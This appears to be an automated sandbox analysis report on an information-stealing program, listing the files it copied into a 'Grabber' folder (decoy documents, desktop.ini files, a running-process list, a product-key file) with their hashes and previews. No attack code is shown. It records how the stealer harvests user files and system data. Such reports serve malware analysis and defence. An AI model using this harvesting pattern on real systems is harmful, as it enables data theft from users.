IPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Downloads\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.5191090305155277
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
MD5:	3A37312509712D4E12D27240137FF377
SHA1:	30CED927E23B584725CF16351394175A6D2A9577
SHA-256:	B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
SHA-512:	DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Reputation:	unknown
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\System\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	17264
Entropy (8bit):	5.69544679328736
Encrypted:	false
SSDEEP:	96:HzFXTdqBUEIctw2zqmTB9stgf9wBMwTmfJg1Wx1HJ2:HdTdqBUEI52mmYtE2MwTm6Wx1p2
MD5:	29E1A048B32C8E36E6428FA8A51B16F3
SHA1:	C1E0F9889350A3A5D0C98A670DBCB4DC43D0D07E
SHA-256:	677FB402DA27C33F26575CD8FF127C631198593256B467263636A03213637611
SHA-512:	D7B377293FFE09E6FF059C59C51945110EA48F3F6E45CE98535DEF76DDF98F0F36E1C284281140F103A4E281A208C763051757F08C0752C363D3B041E4CB8BBF
Malicious:	false
Reputation:	unknown
Preview:	NAME: svchost..PID: 2152..EXE: ..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE..PID: 5164..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost..PID: 6024..EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost..PID: 784..EXE: ..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: ..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.814371943179627
Encrypted:	false
SSDEEP:	3:IEqdVoq:IEqn9
MD5:	07891FA9AD66325DD8D52FD3E1D9589A
SHA1:	781C0458F84526977DC075FF0338F19170AFBA75
